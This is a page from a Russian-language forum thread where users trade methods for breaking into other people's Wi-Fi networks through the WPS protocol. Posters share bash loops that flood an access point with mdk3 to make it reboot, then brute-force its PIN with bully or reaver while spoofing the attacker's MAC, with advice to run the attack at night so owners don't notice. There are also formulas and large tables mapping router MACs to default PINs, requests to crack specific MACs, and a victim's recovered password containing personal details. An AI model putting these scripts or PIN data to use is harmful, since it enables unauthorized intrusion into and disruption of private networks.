Просмотр полной версии : Уязвимость в протоколе Wi-Fi Protected Setup
Страницы :
1
2
3
4
5
6
[
7]
8
9
10
11
12
13
14
15
16
17
18
19
20
Ну почему, если товарищ найдёт закономерность и запрограммирует свой генератор, работающий по новому принципу... почему бы и нет?
http://habrahabr.ru/post/209572/
"Технология WiFi преимущественно использует частоты вблизи 2,4 ГГц. Микроволновые печи работают на той же частоте из-за поглощения водой этих частот, что позволяет нагревать воду. Таким образом, любой большой объем воды между вами и точкой доступа уменьшит сигнал. Примеры: деревья (и повышенная влажность рядом с ними из-за испарения), цемент, бетон и шлакоблоки..."
какая ещё закономерность? только у кинетиков такие пины(т.е первод из 16 в 10)другие производители от фонаря придумывают пины......поэтому к ним генератор толку применять то всё равно пин не такой будет,как его переведёт генератор
binarymaster
20.01.2014, 17:21
какая ещё закономерность? только у кинетиков такие пины(т.е первод из 16 в 10)другие производители от фонаря придумывают пины......поэтому к ним генератор толку применять то всё равно пин не такой будет,как его переведёт генератор
Из моего опыта, закономерность есть также в DIR-300 от билайна, но алгоритм вычисления немного отличается. Если нужно, объясню.
Из моего опыта, закономерность есть также в DIR-300 от билайна, но алгоритм вычисления немного отличается. Если нужно, объясню.
ну я даже на своём дир 300 пробовал по маку перевести,что бы пин получился,пин абсолютно другой.Потому что все производители,кроме кинетиков пин не по маку делают,а в тп линках вообще можно свой пин придумывать
Из моего опыта, закономерность есть также в DIR-300 от билайна, но алгоритм вычисления немного отличается. Если нужно, объясню.
Да, если можно, то про билайновские роутеры хотелось бы узнать.
binarymaster
20.01.2014, 22:12
Да, если можно, то про билайновские роутеры хотелось бы узнать.
С ними всё также просто, как с зукселями. Берём вторую часть мака, переводим в 10-ную систему, прибавляем число 756992, и берём по модулю 10000000.
Но это актуально только для DIR-300 с билайновской прошивкой. Их мак адрес, как правило, начинается с 2C:AB:25. И по умолчанию WPS отключён.
ну я даже на своём дир 300 пробовал по маку перевести,что бы пин получился,пин абсолютно другой.Потому что все производители,кроме кинетиков пин не по маку делают,а в тп линках вообще можно свой пин придумывать
Алгоритм преобразования мака в пин может быть сколь угодно сложным. Перевод из 16 в 10 это лишь один из простейших. Неожиданно, не так ли?)
Делюсь интересным опытом.
Как вы знаете, есть точки, которые лочат wps через определенное количество попыток до следующей перезагрузки. Однако, даже после перезагрузки, такие точки в wash все равно продолжают показываться как залоченые. Не знаю, с чем это связано, то ли защита такая, то ли, что более вероятно, криворукие китайцы такое поведение напрограмили. До недавнего времени, я бросал такие точки по понятным причинам. Но тут мне стало интересно, зачем в reaver и bully существует опция -L
Я начал разбираться, и понял, что атаку на wps по некоторым точкам с таким поведением, как я описал выше, можно продолжить. Снова десять попыток и снова блокировка до перезагрузки. Далее, вспомнил про mdk3, попробовал напустить ее на такую точку, и о чудо - она перезагрузилась после непродолжительной атаки(10-15секунд). Ну а дальше требовалось просто автоматизировать процесс перебора десяти пинов, атаки mdk для перезагрузки, и снова перебор итд.....Это было уже дело техники. Сделать это можно примерно так:
while true
do
timeout 15s mdk3 mon0 a -a XX:XX:XX:XX:XX:XX -s 200 -m
sleep 10
timeout -s SIGINT 60s bully -b XX:XX:XX:XX:XX:XX -v 3 -S -C -L -c 1,2,3,4,5,6,7,8,9,10,11,12,13 mon0
sleep 3
done
Одна точка уже сдалась - тупилинк841. Вторая в процессе, судя по мак - это тоже какой-то тупилинк. Так что метод рабочий, по крайней мере для некоторых девайсов этого производителя. Единственное что - нужно не жадничать, и стараться запускать скрипт исключительно в ночное время, а рано утром выключать, т.к. хозяину ТД вряд ли могут понравиться постоянные её перезагрузки, и соответственно, невозможность нормально пользоваться wifi.
Vikhedgehog
21.01.2014, 00:58
Делюсь интересным опытом.
Как вы знаете, есть точки, которые лочат wps через определенное количество попыток до следующей перезагрузки. Однако, даже после перезагрузки, такие точки в wash все равно продолжают показываться как залоченые. Не знаю, с чем это связано, то ли защита такая, то ли, что более вероятно, криворукие китайцы такое поведение напрограмили. До недавнего времени, я бросал такие точки по понятным причинам. Но тут мне стало интересно, зачем в reaver и bully существует опция -L
Я начал разбираться, и понял, что атаку на wps по некоторым точкам с таким поведением, как я описал выше, можно продолжить. Снова десять попыток и снова блокировка до перезагрузки. Далее, вспомнил про mdk3, попробовал напустить ее на такую точку, и о чудо - она перезагрузилась после непродолжительной атаки(10-15секунд). Ну а дальше требовалось просто автоматизировать процесс перебора десяти пинов, атаки mdk для перезагрузки, и снова перебор итд.....Это было уже дело техники. Сделать это можно примерно так:
while true
do
timeout 15s mdk3 mon0 a -a XX:XX:XX:XX:XX:XX -s 200 -m
sleep 10
timeout -s SIGINT 60s bully -b XX:XX:XX:XX:XX:XX -v 3 -S -C -L -c 1,2,3,4,5,6,7,8,9,10,11,12,13 mon0
sleep 3
done
Одна точка уже сдалась - тупилинк841. Вторая в процессе, судя по мак - это тоже какой-то тупилинк. Так что метод рабочий, по крайней мере для некоторых девайсов этого производителя. Единственное что - нужно не жадничать, и стараться запускать скрипт исключительно в ночное время, а рано утром выключать, т.к. хозяину ТД вряд ли могут понравиться постоянные её перезагрузки, и соответственно, невозможность нормально пользоваться wifi.
Спасибо за информацию, я поначалу думал что их надо вручную перезагружать хозяину после mdk3 атаки.
На точке которая в нашем дворе не прокатило. После нескольких перезагрузок продолжает показывать wps, в винде предлагается нажать wps кнопку а вот ривер не идет, аиреплай говорит "Association denied (code 20). Вы с таким не встречались?
Вы с таким не встречались?
Нет, точек с таким поведением я не видел. Без работающей ассоциации работа протокола wps невозможна. Поэтому непонятно, зачем точка блокирует ассоциацию, при этом показывая, что wps включен. Хотя, возможно, что именно таков и был алгоритм, и ассоциация вместе с wps заработает после нажатия кнопки wps на роутере, о чем и сообщает винда.
В любом случае, без работающей ассоциации, удаленно с такой точкой ничего через wps сделать не получится, увы.
Vikhedgehog
21.01.2014, 01:32
Нет, точек с таким поведением я не видел. Без работающей ассоциации работа протокола wps невозможна. Поэтому непонятно, зачем точка блокирует ассоциацию, при этом показывая, что wps включен. Хотя, возможно, что именно таков и был алгоритм, и ассоциация вместе с wps заработает после нажатия кнопки wps на роутере, о чем и сообщает винда.
В любом случае, без работающей ассоциации, удаленно с такой точкой ничего через wps сделать не получится, увы.
Подумал, скорее всего это бан по мак адресу, а впс в винде срабатывал видимо потому что она ставит встроенный адаптер на первое место, а я в бэктрэке юзаю только внешний. Можете написать скрипт который во время перезагрузки точки заодно меняет мак адрес адаптера на рандомный тк программист из меня никакой. Спасибо
как всё таки приятно работать с сетями,когда сухо,солнечно,сигналы от точек просто супер
Stranger@
21.01.2014, 12:41
На точке которая в нашем дворе не прокатило. После нескольких перезагрузок продолжает показывать wps, в винде предлагается нажать wps кнопку а вот ривер не идет, аиреплай говорит "Association denied (code 20). Вы с таким не встречались?
У меня такое было с Tp-linkom, тоже не мог понять почему не проходит ассоциация в reaver, пока не разобрался, клиент отключает пин-код роутера, а ставит произвольный свой, reaver показывает наличие открытого WPS, а асосцииацию невозможно произвести, ни с помощью reaver, ни с aireplay-ng.
http://s017.radikal.ru/i443/1312/0e/6867cf0d4f5d.png
Vikhedgehog
21.01.2014, 15:40
У меня такое было с Tp-linkom, тоже не мог понять почему не проходит ассоциация в reaver, пока не разобрался, клиент отключает пин-код роутера, а ставит произвольный свой, reaver показывает наличие открытого WPS, а асосцииацию невозможно произвести, ни с помощью reaver, ни с aireplay-ng.
Не совсем понял, чтоб wps отключился нужно чтоб вмешивался хозяин точки? И можно ли как-то вычислить новый PIN и потом запустить ривер с мак адресом уже подключенного компьютера чтоб получить пароль?
который во время перезагрузки точки заодно меняет мак адрес адаптера на рандомный
while true
do
timeout 15s mdk3 mon0 a -a XX:XX:XX:XX:XX:XX -s 200 -m
ifconfig mon0 down
macchanger -r mon0
ifconfig mon0 up
sleep 10
timeout -s SIGINT 60s bully -b XX:XX:XX:XX:XX:XX -v 3 -S -C -L -c 1,2,3,4,5,6,7,8,9,10,11,12,13 mon0
sleep 3
done
while true
do
timeout 15s mdk3 mon0 a -a XX:XX:XX:XX:XX:XX -s 200 -m
ifconfig mon0 down
macchanger -r mon0
ifconfig mon0 up
sleep 10
timeout -s SIGINT 60s bully -b XX:XX:XX:XX:XX:XX -v 3 -S -C -L -c 1,2,3,4,5,6,7,8,9,10,11,12,13 mon0
sleep 3
done
Расскажите пожалуйста "на пальцах",что куда вводить. столкнулась с такой проблемой,что через 10 пинов точка уходит в лок ,обычно на сутки,но с помощью команды mdk3 ,я брала в пример Вашу,точка перезагружается,и снова позволяет пробить 10 пинов. как можно это сделать в автоматическом режиме? точнее-что куда прописать,и пользуюсь я ривером,не bully.
Vikhedgehog
21.01.2014, 19:04
while true
do
timeout 15s mdk3 mon0 a -a XX:XX:XX:XX:XX:XX -s 200 -m
ifconfig mon0 down
macchanger -r mon0
ifconfig mon0 up
sleep 10
timeout -s SIGINT 60s bully -b XX:XX:XX:XX:XX:XX -v 3 -S -C -L -c 1,2,3,4,5,6,7,8,9,10,11,12,13 mon0
sleep 3
done
Спасибо)
У меня такое было с Tp-linkom, тоже не мог понять почему не проходит ассоциация в reaver, пока не разобрался, клиент отключает пин-код роутера, а ставит произвольный свой, reaver показывает наличие открытого WPS, а асосцииацию невозможно произвести, ни с помощью reaver, ни с aireplay-ng.
http://s017.radikal.ru/i443/1312/0e/6867cf0d4f5d.png
Я когда попробовал сделать также в настройках (TL-WR841N) ассоциация продолжала работать, отключить пин код маршрутизатора = просто залочило wps. Так что видимо код 20 это что то другое. Или может прошивка какая-то особенная, не знаю.
Расскажите пожалуйста "на пальцах",что куда вводить.
в командной строке в kali linux копируешь и вставляешь одной строкой:
while true; do timeout -s SIGINT 60s reaver -i mon0 -b XX:XX:XX:XX:XX:XX -vv -N -s /etc/reaver/XXXXXXXXXXXX.wpc -L; sleep 3; timeout 15s mdk3 mon0 a -a XX:XX:XX:XX:XX:XX -s 200 -m; sleep 10; done;
в командной строке в kali linux копируешь и вставляешь одной строкой:
while true; do timeout -s SIGINT 60s reaver -i mon0 -b XX:XX:XX:XX:XX:XX -vv -N -s /etc/reaver/XXXXXXXXXXXX.wpc -L; sleep 3; timeout 15s mdk3 mon0 a -a XX:XX:XX:XX:XX:XX -s 200 -m; sleep 10; done;
а как в бактраке запустить этот скрипт
Mr1perfeckt
21.01.2014, 23:39
D8:EB:97:1F:3F:11 TRENDnet651
Кто поможет подобрать пин?
binarymaster
22.01.2014, 00:25
D8:EB:97:1F:3F:11 TRENDnet651
Кто поможет подобрать пин?
Недавно пробовал подобрать пин к точке от акадо, по маку тоже начинающейся с D8:EB:97. Так и не подобрал. Перебрало все варианты первой части (2 раза пробовал), видимо возможность заблокирована из настроек роутера.
Да и по этому маку у меня очень маленькая статистика, всего одна запись в базе
D8:EB:97:14:12:CD | 31850483
Из моих наблюдений, на Тренднет нужно ходить с булли: плохо они риверу отвечают и даже были случаи (специально проверял) риверу не отдают PSK, а булли отдают.
Я только одну точку встречал с D8:EB:97 и тоже именно с булли открыл, причем без заморочек. Но провайдер был не акадо.
а как в бактраке запустить этот скрипт
Также, только изменить путь в опции -s , т.к. сэйвы reaver`а в bt пишутся по другому пути, насколько я помню.
незнаю как вам....а мне були вообще не нравится,ривер хоть перебирает,это видно.....а булли как то странно перебирает.....короче никак не нравится...
D8:EB:97:1F:3F:11 TRENDnet651
Кто поможет подобрать пин?
Попадался TRENDnet с похожим MAC'ом: D8:EB:97:20:17:24,
pin был 13012700.
Также, только изменить путь в опции -s , т.к. сэйвы reaver`а в bt пишутся по другому пути, насколько я помню.
Klaatu вспомни пожалуйста у меня тут есть одна точка при досе роутер уходить в перезагрузку все делаю вручную хотелось бы чтоб все было в автомате
PSYDRUGS
23.01.2014, 00:59
Посмотрите пожалуйста PIN для MAC: 48:5B:39:36B:BB
Посмотрите пожалуйста PIN для MAC: 48:5B:39:36B:BB
У меня был случай, когда точка с началом 48:5B:39 выдала риверу PSK на запрос с ключом -р 12345670, хотя потом зашел в роутер, а там пин совсем другой. Видимо зависит от прошивки. Это был Asus RT-N10.
PSYDRUGS
23.01.2014, 03:44
У меня был случай, когда точка с началом 48:5B:39 выдала риверу PSK на запрос с ключом -р 12345670, хотя потом зашел в роутер, а там пин совсем другой. Видимо зависит от прошивки. Это был Asus RT-N10.
Ненавижу ASUS, постоянно лочаться, случайно подобрал хендшейк к RT-N12 3.0.0.4.260, PIN был 00774024, MAC адрес: 740:2B:3A:20:54.
C 00:0E:8F совсем тухляк?, пины что выдает генератор не подходят.
binarymaster
23.01.2014, 03:55
Посмотрите пожалуйста PIN для MAC: 48:5B:39:36B:BB
48:5B:39:07:FD:90 | 85643079
48:5B:39:0E:5C:9C | 99886301
48:5B:39:0E:5C:C8 | 98132126
48:5B:39:12:9A:90 | 75709037
48:5B:39:17:56:34 | 52809385
48:5B:39:17:57:FA | 68090685
48:5B:39:30:34:4A | 73578529
48:5B:39:3B:2C:E8 | 22066442
48:5B:39:41:1D:50 | 75356606
48:5B:39:79:31:E4 | 78168121
48:5B:39:B0:3A:EA | 41371183
48:5B:39:B0:44:44 | 31933025
48:5B:39:B0:48:4A | 28347668
48:5B:39:BC:14:96 | 23260382
48:5B:39:BC:15:77 | 23262638
48:5B:39:BC:17:38 | 23267121
48:5B:39:BC:18:65 | 23270138
48:5B:39:BC:22:37 | 23295278
48:5B:39:BC:25:77 | 23303591
48:5B:39:BC:50:B6 | 23414303
48:5B:39:BC:58:BE | 23434868
48:5B:39:BC:69:7B | 23477711
48:5B:39:BC:6A:D4 | 23481169
48:5B:39:BC:6C:38 | 23484726
48:5B:39:BC:6F:31 | 23492332
48:5B:39:BC:6F:36 | 23492387
48:5B:39:BC:71:71 | 23498099
48:5B:39:BC:72:90 | 23500969
48:5B:39:BC:76:F5 | 23512214
48:5B:39:BC:78:82 | 23516182
48:5B:39:BC:79:BB | 23519312
48:5B:39:BD:36:44 | 24001960
48:5B:39:BD:4D:84 | 24061483
48:5B:39:C7:DB:E8 | 51604042
48:5B:39:C7:DF:48 | 50572496
48:5B:39:C8:D9:FA | 82729264
48:5B:39:C8:F6:BC | 61142909
48:5B:39:CD:35:3E | 86946261
48:5B:39:CD:4D:E2 | 44142285
48:5B:39:D7:35:98 | 02580142
48:5B:39:D7:64:5A | 22673374
48:5B:39:E7:BD:8E | 02141312
48:5B:39:E7:BF:69 | 18362374
48:5B:39:E7:D8:0E | 53425522
48:5B:39:E7:E2:D0 | 60978448
48:5B:39:E7:E5:F7 | 68471620
48:5B:39:E7:E7:3E | 97440512
48:5B:39:E7:E9:28 | 91953582
48:5B:39:E8:27:9D | 86376211
48:5B:39:F9:7A:C0 | 63498882
Any ideas?) Кстати, большинство из них подчиняется закону 16:10.
C 00:0E:8F совсем тухляк?, пины что выдает генератор не подходят.
Угу, из внешки вообще не удаётся насканить, хотя много раз пытался их обнаружить.
Vikhedgehog
23.01.2014, 04:38
Ненавижу ASUS, постоянно лочаться, случайно подобрал хендшейк к RT-N12 3.0.0.4.260, PIN был 00774024, MAC адрес: 740:2B:3A:20:54.
C 00:0E:8F совсем тухляк?, пины что выдает генератор не подходят.
Взломал 2 точки ASUS, которые не лочили wps. Пины у обеих тоже начинались с нуля, такое ощущение складывается что там почти у всех такие пины, с блокировкой правда беда(
Взломал 2 точки ASUS, которые не лочили wps. Пины у обеих тоже начинались с нуля, такое ощущение складывается что там почти у всех такие пины, с блокировкой правда беда(
то тебе повезло,прошивки древние видимо стояли,а так асус можно и не пытаться взламывать(современные,с современной прошивкой)нафига это мучение.....
кстати как и современные TP-LINK ,с свежей прошивкой....тоже лочатся и на долго,или до перезагрузки......скоро вообще все точки,всех производителей лочится будут и вообще wps исчезнет,не будут на точки его устанавливать
кстати как и современные TP-LINK ,с свежей прошивкой....тоже лочатся и на долго,или до перезагрузки......скоро вообще все точки,всех производителей лочится будут и вообще wps исчезнет,не будут на точки его устанавливать
Вот тогда и вспомнишь свои слова о бесполезной трате времени на брут хендшейков...
Вот тогда и вспомнишь свои слова о бесполезной трате времени на брут хендшейков...
не,ну если точно знать,что челы ставят только цифры,или типа qwerty,то да....можно и побрутить ,а так это трата времени,убивание проца и видухи и тд.....лотерея короче
tr1ckyBiT
24.01.2014, 01:50
...тоже лочатся и на долго,или до перезагрузки......скоро вообще все точки,всех производителей лочится будут и вообще wps исчезнет,не будут на точки его устанавливать
Может ты хоть тогда перестанешь ветку засырать..
PSYDRUGS
24.01.2014, 04:04
не,ну если точно знать,что челы ставят только цифры,или типа qwerty,то да....можно и побрутить ,а так это трата времени,убивание проца и видухи и тд.....лотерея короче
вот пример: случайно подобрал PIN к TD-W8961ND F4:EC:38:FF:7F7 PIN: 67444076. Угадай какой длины был пароль: 27 символов (samohvalova26111980evgenia) как долго подбирал бы?
Посмотрите ещё пожалуйста PIN к MAC: 10:FE:ED:3E:5A:B2.
tr1ckyBiT
24.01.2014, 05:20
случайно подобрал PIN к TD-W8961ND F4:EC:38:FF:7F7 PIN: 67444076
А почему случайно? Чистой воды hex-to-dec корреляция:
FF:7F7=16744407, 16744407(mod)10000000=6744407 и добавляем checksum 6 .
Значит и среди TP-Link'ов есть такие экземплярчики!?.
PSYDRUGS
24.01.2014, 11:36
точки с плохим сигналом, может смена канала чуть улучшит сигнал.
посмотрите PIN пожалуйста, ломать в лом, чисто спортивный интерес:
D-Link 00:22:B0:F4:A0:8F и ZyXEL 40:4A:03:B3:41:A0. Спасибо.
А почему случайно? Чистой воды hex-to-dec корреляция:
FF:7F7=16744407, 16744407(mod)10000000=6744407 и добавляем checksum 6 .
Значит и среди TP-Link'ов есть такие экземплярчики!?.
та это точно случайно.....потому что TP-LINK ,производители этих точек пины ставят не по принципу с 16 в 10,тем более можно менять на произвольный вообще Так что действительно случайно,повезло просто,что такой пин был.....
точки с плохим сигналом, может смена канала чуть улучшит сигнал.
посмотрите PIN пожалуйста, ломать в лом, чисто спортивный интерес:
D-Link 00:22:B0:F4:A0:8F и ZyXEL 40:4A:03:B3:41:A0. Спасибо.
тю....ZyXEL 100% пин будет из 16 в 10
Vikhedgehog
24.01.2014, 12:13
А почему случайно? Чистой воды hex-to-dec корреляция:
FF:7F7=16744407, 16744407(mod)10000000=6744407 и добавляем checksum 6 .
Значит и среди TP-Link'ов есть такие экземплярчики!?.
На ADSL2+ модемах от TP-LINK так и есть, жаль что все в основном используют не такие(
На ADSL2+ модемах от TP-LINK так и есть, жаль что все в основном используют не такие(
а просто у роутеров TP-LINK пины абсолютно не по принципу 16 в 10,ещё и лочатся,правда если роутеры современные,или прошивки свежие...
binarymaster
24.01.2014, 15:47
тю....ZyXEL 100% пин будет из 16 в 10
А вот тут не согласен
Для серии роутеров ZyXEL ZyWALL, на которых также есть WPS по умолчанию, этот алгоритм не подходит.
А вот тут не согласен
Для серии роутеров ZyXEL ZyWALL, на которых также есть WPS по умолчанию, этот алгоритм не подходит.
принимается потому что не пробовал именно ZyWALL,а только или простые,или lite...
те что я пробовал,абсолютно у всех пин был с 16 в 10,штук 8 таких ZyXEL открыл Все бы только такие точки покупали б
Делюсь опытом
Всем привет =) хочу поделится опытом и нароботками)
Всеми нами любимый ростелеком предоставляет роутеры фирмы Sagemcom. Зашита у них очень дырявая, они на всех роутерах используют некоторый список Pinов =)
А именно на старых прошивках такая картина:
4C:17:EB:XX:XX:XX
E8:F1:B0:XX:XX:XX
C0:AC:54:XX:XX:XX
используются пины: 46264848, 76229909, 21464065, 13585907
Для новой прошивки картина хуже( они стали лочится, нашел только пин для одного вида мас:
7C:03:D8:XX:XX:XX - 10864111
D8:6C:E9:XX:XX:XX - ????????
2C:39:96:XX:XX:XX - ????????
3C:81:D8:XX:XX:XX - ????????
Мною именно этими пинами именно эти мак адреса были открыта на 100%, не 1 осечки, кроме новых прошивок! Каждым пином было открыто более 4 роутеров.(даже с новой прошивкой мне извесный мак)
Так вот, люди если кто пользуется ростелекомом с таким роутером и с маком с неизвесным пином, или уже имеет на руках эти пины поделитесь))))
Так же имеется небольшая база на роутеры билайна Smart-Box:
00:0E:8F:01:9D:78 38903663
00:0E:8F:01:9D:9C 47300620
00:0E:8F:01:9E:38 41579510
00:0E:8F:01:9E:3C 36887743
00:0E:8F:D3:D7:5C 19552422
Как видно зависимости на первый взгляд не прослеживается, но она должна быть - это же билайн))))
так же есть интересный архив с частыми маками:
F0:7D:68:3E:50:0F 28504610
F0:7D:68:3E:70:76 83869860
F0:7D:68:3E:B3:BD 11403319
F0:7D:68:3F:FE:90 29558179
F0:7D:68:40:C3:7A 02445908
F0:7D:68:42:9E:FE 16838093
F0:7D:68:42:A8:00 36103690
F0:7D:68:42:A9:40 29481262
F0:7D:68:42:B6:C0 32048988
F0:7D:68:47:22:20 42562573
F0:7D:68:48:EA:B0 64577845
F0:7D:68:48:EB:C2 52857027
F0:7D:68:48:EB:E6 35826071
F0:7D:68:48:EC:38 38366932
F0:7D:68:48:EE:18 46142849
F0:7D:68:48:EE:E8 04325352
F0:7D:68:48:EE:F8 28166597
F0:7D:68:48:EF:14 85466029
F0:7D:68:50:54:BC 10389928
F0:7D:68:50:E2:B4 75425081
F0:7D:68:5B:26:F4 61248939
F0:7D:68:5B:27:C6 78985742
F0:7D:68:5B:28:1C 71452401
F0:7D:68:5B:32:26 75176365
F0:7D:68:5B:B6:AC 62296045
F0:7D:68:5B:B8:14 18375848
F0:7D:68:5B:EC:70 16378315
F0:7D:68:75:8A:97 51762605
F0:7D:68:75:CF:19 94783513
F0:7D:68:81:72:14 41827390
F0:7D:68:81:7A:D0 70182347
F0:7D:68:81:B8:8E 26704548
F0:7D:68:82:3A:32 75682460
F0:7D:68:82:45:A6 94827644
F0:7D:68:82:DD:2B 77305862
F0:7D:68:82:F4:FB 53836908
F0:7D:68:83:15:0B 07021411
F0:7D:68:83:1C:C1 97774167
F0:7D:68:88:8D:AC 76454622
F0:7D:68:8A:9F:EA 44505530
F0:7D:68:8A:A8:48 76433443
F0:7D:68:8C:58:B2 03422045
F0:7D:68:8C:5C:7C 73972396
F0:7D:68:8C:5C:86 96076972
F0:7D:68:8C:6C:A6 28712237
F0:7D:68:8C:6D:8C 74275724
F0:7D:68:8C:6E:90 35967163
F0:7D:68:8D:F0:22 77387097
F0:7D:68:8D:F0:6A 88899367
F0:7D:68:95:30:1E 06329464
F0:7D:68:95:B2:F2 76563287
F0:7D:68:97:C0:D6 56194760
F0:7D:68:97:C0:DC 79133067
F0:7D:68:9B:19:D2 83948398
F0:7D:68:9B:37:42 80514367
F0:7D:68:9B:62:FE 77912954
F0:7D:68:9B:C5:DD 51965334
F0:7D:68:9B:DA:E9 02415635
F0:7D:68:9B:F5:C8 31143769
F0:7D:68:A0:68:BA 29454785
F0:7D:68:A1:66:B0 26639451
F8:1A:67:8A:F1:04 06695972
F8:1A:67:97:22:18 78488113
F8:1A:67:C3:B3:90 92407213
F8:1A:67:CB:4F:E6 68474836
F8:1A:67:CB:53:D0 14721359
F8:1A:67:CB:57:FC 88821344
F8:1A:67:CC:E7:44 50042227
F8:1A:67:EC:91:EE 36735600
F8:1A:67:EC:99:3E 04165415
F8:1A:67:F8:40:F4 65597231
Вот) Такие у меня дела) считаю что все пины строятся по какой то логике))) надо ток ее просеч)))
Люди, кто знает,прошивка на роутеры пишется на асемблере???
tr1ckyBiT
25.01.2014, 06:53
Хорошие выборки, особенно первая. Если там нету шума, можна попробовать поддать ее статистическому анализу в MathLab'е, а вось и найдется какая-нибудь закономерность.
---
Читал что для таких устройств как роутеры ассемблер самый подходящий язык программирования; но прежде чем копаться в этих исходниках, много полезного можно почерпнуть в файловой системе роутера , ядре и загрузчике. На многих девайсах стоит OS MIPS Linux и загрузчик U-Boot, которые хорошо документированы, что облегчает реверсинг.
binarymaster
25.01.2014, 13:29
Загрузчик скорее всего на ассемблере пишут, ну а ядро Linux и остальное ПО, в нём живущее - для этого есть кросс-компилятор gcc на архитектуру MIPS.
Где-то видел статью, в которой был приведён пример написания Hello World на C++ для роутера.
VasiliyP
25.01.2014, 13:57
Люди, кто знает,прошивка на роутеры пишется на асемблере???
Вы хотите поковырять прошивку на предмет алгоритма генерации пинов? Теоретически, он там может быть, для сброса пина в заводское состояние, когда юзер жмет соответствующую кнопку. Если производитель на у себя сайте выкладывает прошивки, можно попробовать ее распаковать при помощи "Firmware Modification Kit" и поискать соответствующий код. А если не выкладывает, то нужно думать, как ее вытащить из роутера
Делюсь интересным опытом.
Как вы знаете, есть точки, которые лочат wps через определенное количество попыток до следующей перезагрузки. Однако, даже после перезагрузки, такие точки в wash все равно продолжают показываться как залоченые. Не знаю, с чем это связано, то ли защита такая, то ли, что более вероятно, криворукие китайцы такое поведение напрограмили. До недавнего времени, я бросал такие точки по понятным причинам. Но тут мне стало интересно, зачем в reaver и bully существует опция -L
Я начал разбираться, и понял, что атаку на wps по некоторым точкам с таким поведением, как я описал выше, можно продолжить. Снова десять попыток и снова блокировка до перезагрузки. Далее, вспомнил про mdk3, попробовал напустить ее на такую точку, и о чудо - она перезагрузилась после непродолжительной атаки(10-15секунд). Ну а дальше требовалось просто автоматизировать процесс перебора десяти пинов, атаки mdk для перезагрузки, и снова перебор итд.....Это было уже дело техники. Сделать это можно примерно так:
while true
do
timeout 15s mdk3 mon0 a -a XX:XX:XX:XX:XX:XX -s 200 -m
sleep 10
timeout -s SIGINT 60s bully -b XX:XX:XX:XX:XX:XX -v 3 -S -C -L -c 1,2,3,4,5,6,7,8,9,10,11,12,13 mon0
sleep 3
done
Одна точка уже сдалась - тупилинк841. Вторая в процессе, судя по мак - это тоже какой-то тупилинк. Так что метод рабочий, по крайней мере для некоторых девайсов этого производителя. Единственное что - нужно не жадничать, и стараться запускать скрипт исключительно в ночное время, а рано утром выключать, т.к. хозяину ТД вряд ли могут понравиться постоянные её перезагрузки, и соответственно, невозможность нормально пользоваться wifi.
С этими параметрами на одной точке выдаёт WPS transaction failed (code: 0x03), re-trying last ping, а на другой-[!] WARNING: Receive timeout occurred. Что посоветуеш?
binarymaster
25.01.2014, 20:25
С этими параметрами на одной точке выдаёт WPS transaction failed (code: 0x03), re-trying last ping, а на другой-[!] WARNING: Receive timeout occurred. Что посоветуеш?
Сигнал слабый, увеличить задержку перебора.
while true
do
timeout 15s mdk3 mon0 a -a XX:XX:XX:XX:XX:XX -s 200 -m
sleep 10
timeout -s SIGINT 60s bully -b XX:XX:XX:XX:XX:XX -v 3 -S -C -L -c 1,2,3,4,5,6,7,8,9,10,11,12,13 mon0
sleep 3
done
эта команда от кали линукс а как запустить эту команду в бектреке?
pin для 10:fe:ed знает кто?
pin для 10:fe:ed знает кто?
Конкретного пина нет! Алгоритмом 16->10 и его модификациями не вычислить! Ищем зависимость а пока что хендшейки лови =)
Конкретного пина нет! Алгоритмом 16->10 и его модификациями не вычислить! Ищем зависимость а пока что хендшейки лови =)
поймал куда можно обратиться о помощи помочь расшифровать ?
поймал куда можно обратиться о помощи помочь расшифровать ?
на форуме тема есть... ищи в этом разделе
поймал куда можно обратиться о помощи помочь расшифровать ?
Вот сюда.
Сигнал слабый, увеличить задержку перебора.
Если не трудно-объясни какую задержку можно менять и в каких пределах желательно. И ещё-при работе MDK3 переодически пишет, что какая-то частота неизвестная (или не поддерживается) Device is still responding with 2000 clients connected!
Connecting Client: 00:09:5B:02:FF:4C to target AP: A0:F3:C1:58:16:50
Connecting Client: 00:09:5B:5B:17:08 to target AP: A0:F3:C1:58:16:50
AP A0:F3:C1:58:16:50 seems to be INVULNERABLE!
Device is still responding with 2500 clients connected!
Connecting Client: 00:04:5A:2D:80:1A to target AP: A0:F3:C1:58:16:50
Connecting Client: 00:09:7C:E9:6D:92 to target AP: A0:F3:C1:58:16:50
AP A0:F3:C1:58:16:50 seems to be INVULNERABLE!
Device is still responding with 3000 clients connected!
Connecting Client: 00:40:01:86:FD:89 to target AP: A0:F3:C1:58:16:50
Packets sent: 3122 - Speed: 231 packets/sec[X] Unknown frequency '-613135872' reported by interface 'mon0'. Это в случае с BULLY. А в случае while true; do timeout -s SIGINT 60s reaver -i mon0 -b XX:XX:XX:XX:XX:XX -vv -N -s /etc/reaver/XXXXXXXXXXXX.wpc -L; sleep 3; timeout 15s mdk3 mon0 a -a XX:XX:XX:XX:XX:XX -s 200 -m; sleep 10; done; получаю как указал в предыдущем сообщении, после которого советуеш увеличить задержку. Заблаговременно спасибо.
Люди помощь требуется)
вот что надыбал в последней прошивки роутера ростелекома sagemcom
var WscDevPin = '';
var WscStaPin = '';
var WscMode = '';
var WscIRMode = '';
var WscAPMode = '';
var sessionKey='';
var WscCfgMethod = '';
var WscVer2 = '';
var WscIsForceWpsDisable = '';
var phy = '';
var nmode = '';
var wlWapiAvail = '';
var preAuthMode;
Вот еще!
Значение берется отсюда wlWscDevPin, как сюда проникнуть кто знает? Может быть есть какой нибудь эмулятор роутера, с возможностью менять mac адрес, просто на него запилить эту прошивку и посмотреть как себя поведет) Но ток мне кажется это фантастика) Что делать?) HELP
PS искал подробности о ejGetWl() но безуспешно(
вся прошивка
tr1ckyBiT
26.01.2014, 19:56
Если прошивка на MIPS Linux, можно попробовать на VMWare поставить ..
VasiliyP
26.01.2014, 20:52
Значение берется отсюда wlWscDevPin, как сюда проникнуть кто знает?
По этой строке ищется файл libwlmngr.so. Там, в функции wlmngr_getVar, пин читается из nvram, он хранится отдельно от мака.
По этой строке ищется файл libwlmngr.so. Там, в функции wlmngr_getVar, пин читается из nvram, он хранится отдельно от мака.
Смотри я нашел libwlmngr.so и nvram но в nvram я чет не нашел не 1 упоминания о пине... может я чет не то сделал, можешь объяснить подробнее
VasiliyP
26.01.2014, 21:54
может я чет не то сделал, можешь объяснить подробнее
nvram - это специальная микросхема, в которой хранятся все индивидуальные настройки, в том числе пин. А файл bin/nvram - это вероятно, драйвер той микросхемы, в нем пинов нет
